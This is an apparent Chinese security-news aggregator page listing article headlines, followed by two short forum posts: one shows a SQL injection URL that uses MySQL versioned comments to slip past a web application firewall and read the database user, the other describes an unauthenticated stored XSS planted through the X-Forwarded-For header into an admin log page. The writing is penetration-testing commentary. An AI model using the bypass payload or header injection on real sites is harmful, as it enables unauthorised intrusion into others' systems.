Aggregator
【中奖名单】《白帽子讲Web安全》(第2版)书籍中奖名单公布啦!
腾讯安全科恩实验室2023社会招聘启动,开放三大社招岗位
腾讯安全科恩实验室2024校园招聘启动,开放六大校招岗位
玄 - 利用DLL通知回调函数注入shellcode(上) - zha0gongz1
Akamai Develops Real-Time Detections for DNS Exfiltration
angr symbion
blackhat 2023 USA 和 defcon 31 议题总结
通过360全网资产测绘产品在特殊时期寻找特定资产服务
【漏洞预警】Ivanti Avalanche多个高危漏洞漏洞威胁通告
数据安全相关法规学习笔记
NCSC’s partnership with industry wins Spirit of Service – Service Excellence Award and Prime Minister’s Award
The GCSB's National Cyber Security Centre (NCSC) has been awarded the Public Service Commission’s Spirit of Service – Te Tohu mō te Ratonga Whakahirahire, Service Excellence Award, and the overall Prime Minister’s Award for its collaboration with industry partners to strengthen New Zealand’s cyber defence capabilities.
Redefining Threat Intelligence for MSSPs & MDRs
Akamai Defends Against the OWASP Top 10 API Security Risks
PeiQi文库 - Github更新 (7)
8月19日开幕!KCon 2023,不容错过的网安技术交流大会
原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(上)
过云锁注入方法
环境:windserver2008 + mysql+php
SQL语句拦截图:
http://www.test123.com/article.php?id=1%20union%20select%201,2,3
SQL绕过语句图:
http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()
1 个帖子 - 1 位参与者
一次非常规功能点的存储XSS
一般XSS点是在留言、新增项等等地方,一般也都需要登录
本文记录的试一次渗透中碰到的非常规的XSS功能点,无需登录
所以也可以说是未授权XSS,并且直取admin
漏洞功能点位于【系统日志】处
此处记录并审计登录行为
发现用户在登录时,用户名、IP等信息会被记录在此处,用户名可以根据POST请求包中的【username】字段进行改动,但是在测试过程中发现系统对该字段有进行特殊字符的限制,所以无法实现XSS
但是后面发现对IP字段的输入却没有进行限制,在POST请求头中加入【x-forwarded-for】就可以任意自定义修改此处对应的【操作IP】
插入成功,管理员来到审核页面的时候就会触发XSS
这个系统对所有插入的数据几乎都做了编码、限制、替换,找了好久才找到这个位置
所以测试或者说漏洞修复过程中,除了注意用户GET、POST的数据外,还需注意请求Header头里面的参数
1 个帖子 - 1 位参与者